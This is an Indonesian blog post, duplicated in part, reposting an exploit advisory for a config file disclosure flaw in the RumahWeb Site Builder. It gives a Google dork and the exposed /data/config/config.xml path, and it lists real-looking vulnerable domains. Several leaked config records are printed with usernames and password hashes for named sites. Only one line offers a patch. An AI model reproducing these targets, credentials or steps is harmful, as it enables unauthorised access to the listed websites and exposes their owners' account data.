Entri Populer
-
Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability =======================================================================...
-
GIRILAYA REAL GROUPs Rekening Resmi Milik Jokowi - JK Inject AXIS support Direct listen port :6969 ...
-
r1.rssmix.org ...
-
r1.rssmix.org ...
-
KEWIRAAN Pengantar Kewiraan a. Pengertian pendidikan kewiraan agak berbeda dengan program wajib latih mahasiswa(walapa) yang pernah dila...
-
Pasang Ac Split Surabaya | Jasa Service Ac | Service Ac Surabaya Adalah Cv.Anugerah Teknik Abadi Cv.Anugerah Teknik Abadi Adalah perusahaa...
-
R E S E N S I Kekuasaan Jenderal Garza (David Zayas) di sebuah negara di Amerika Selatan memang sangat kokoh. Dengan kekuatan militer y...
-
Laudya Chintya Bella or usually called bella (born at bandung, 24 februaries 1988) a star sinetron, indonesia nationality actress. Spo...
-
Koleksi Foto Toket Pramugari Narsis - Pramugari Bugil, Toket Pramugari, Tante Bugil, Foto Bugil, Foto Memek, Tante Girang , Memek Tante , M...
Sponsor kita:
Tuesday, December 11, 2012
intext:sitebuilder rumahweb | Girilaya Real Groups
Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability
==========================================================================================
Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability
==========================================================================================
:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Site Builder RumahWeb Arbitrary Config.xml Disclosure Vulnerability
: # Date : 08 Desember 2012
: # Author : X-Cisadane and Xevil (Tomi Zaoldyeck)
: # Vendor : Rumah Web http://www.rumahweb.com/layanan/sitebuilder
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : Arbitrary Config File Disclosure Vulnerability
: # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:
DORKS
=====
intext:sitebuilder rumahweb
Proof of Concept
================
[!] site/data/config/config.xml
For example you've searched it on google and got the result www.kratontour.com/admin
Change the URL to www.kratontour.com/data/config/config.xml
-------[ Content of www.kratontour.com/data/config/config.xml ] ----------------------
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<rows>
<domain>kratontour.com</domain>
<username>krato125</username>
<password>8889720046a32ce05e438c17c004af01</password>
</rows>
-------------------------------------------------------------------------------------
Or you got toyohashi-mosque.org/admin and you have to change the URL to oyohashi-mosque.org/data/config/config.xml
Example :
http://11focus.com/data/config/config.xml
http://711pictures.com/data/config/config.xml
http://7oktav.com/data/config/config.xml
http://afindoguesthouse.com/data/config/config.xml
http://alltranss.com/data/config/config.xml
http://altranpumpjaya.com/data/config/config.xml
http://amanahhusada.com/data/config/config.xml
http://anterotour.com/data/config/config.xml
http://ariaribatik.com/data/config/config.xml
http://asthaoilwellservices.com/data/config/config.xml
http://ayalasbutiq.com/data/config/config.xml
http://baccojakarta.com/data/config/config.xml
http://bbayamm.com/data/config/config.xml
http://bibi-laundry.com/data/config/config.xml
http://bimadrillingtools.com/data/config/config.xml
More results? http://pastebin.com/4VZpiC7e
Sumber : http://go.girilaya.com/0l0qwm
==========================================================================================
Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability
==========================================================================================
:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Site Builder RumahWeb Arbitrary Config.xml Disclosure Vulnerability
: # Date : 08 Desember 2012
: # Author : X-Cisadane and Xevil (Tomi Zaoldyeck)
: # Vendor : Rumah Web http://www.rumahweb.com/layanan/sitebuilder
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : Arbitrary Config File Disclosure Vulnerability
: # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:
DORKS
=====
intext:sitebuilder rumahweb
Proof of Concept
================
[!] site/data/config/config.xml
For example you've searched it on google and got the result www.kratontour.com/admin
Change the URL to www.kratontour.com/data/config/config.xml
-------[ Content of www.kratontour.com/data/config/config.xml ] ----------------------
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<rows>
<domain>kratontour.com</domain>
<username>krato125</username>
<password>8889720046a32ce05e438c17c004af01</password>
</rows>
-------------------------------------------------------------------------------------
Or you got toyohashi-mosque.org/admin and you have to change the URL to oyohashi-mosque.org/data/config/config.xml
Example :
http://11focus.com/data/config/config.xml
http://711pictures.com/data/config/config.xml
http://7oktav.com/data/config/config.xml
http://afindoguesthouse.com/data/config/config.xml
http://alltranss.com/data/config/config.xml
http://altranpumpjaya.com/data/config/config.xml
http://amanahhusada.com/data/config/config.xml
http://anterotour.com/data/config/config.xml
http://ariaribatik.com/data/config/config.xml
http://asthaoilwellservices.com/data/config/config.xml
http://ayalasbutiq.com/data/config/config.xml
http://baccojakarta.com/data/config/config.xml
http://bbayamm.com/data/config/config.xml
http://bibi-laundry.com/data/config/config.xml
http://bimadrillingtools.com/data/config/config.xml
More results? http://pastebin.com/4VZpiC7e
Sumber : http://go.girilaya.com/0l0qwm

Warga GIRILAYA
Learning By DOING
http://blog.girilaya.com/
<rows><domain>baccojakarta.com</domain><username>bacco751</username><password>2f18edd9ec46eeca15a4b759c96c0d0d</password></rows>
bagi teman2 yang sudah terlanjur memakai SITEBUILDer tersebut . .. jangan kwatir dan jangan underestimate dulu. . . ita juga bisa PATCHing koq... dengan menghapus Template dan menghapus template.xml yang ada di /data/config/template.xml.
contoh web diatas bisa terliat karena masih barusan dibuat dan belum diHapus Templatenya..
<rows><domain>pemikiranku.com</domain><username>pemik855</username><password>27a781f1f1ddde5ebc2dd2b796bfc736</password></rows>
<rows><domain>h2rtransport.com</domain><username>h2rtr239</username><password>c747ba108baa3d8212f86a319d445f7c</password></rows>
contoh web diatas bisa terliat karena masih barusan dibuat dan belum diHapus Templatenya..
- Spoiler:
<rows><domain>pemikiranku.com</domain><username>pemik855</username><password>27a781f1f1ddde5ebc2dd2b796bfc736</password></rows>
<rows><domain>h2rtransport.com</domain><username>h2rtr239</username><password>c747ba108baa3d8212f86a319d445f7c</password></rows>
Warga GIRILAYA
Learning By DOING
http://blog.girilaya.com/
http://www.autismajakarta.com/data/config/config.xml
Tinggalkan komentar anda:
Subscribe to:
Post Comments (Atom)
Butuh sponsor blog:
Folowers
Label
- Action (44)
- Adult (7)
- Adventure (34)
- Aneh (17)
- Animation (12)
- cartoon (3)
- Cerita Lucu (11)
- Comedy (13)
- Crime (1)
- Curanmor (10)
- Dewasa (5)
- Dragonball (1)
- Dragonball z (1)
- Drama (14)
- Family (9)
- Fantasy (18)
- Film (20)
- Film Dragonball z (2)
- Game (3)
- Gosip (4)
- Guitar Chord (7)
- Horor (5)
- Html (9)
- Humor (17)
- Internet (4)
- Jokies (5)
- Komedi (16)
- Komik (1)
- Komputer (15)
- Lirik (15)
- Lucu (3)
- Materi Kuliah (1)
- Mengatasi virus shortcut+Rscycler (1)
- misteri (7)
- mistery (2)
- Musical (1)
- Mystery (7)
- Naruto (1)
- patch Idman (1)
- Paypal (1)
- Pengalaman (1)
- PHP dan MySql (4)
- PHP dan MySql in English (3)
- Romance (1)
- Sci-Fi (15)
- Seleb (3)
- Sepak Bola (3)
- Sex (1)
- Soal-Soal Test CPNS (1)
- Sport (1)
- Tablature Guitar (8)
- Thriller (8)
- tips (22)
- Trailer (8)
- unik (47)
0 komentar:
Post a Comment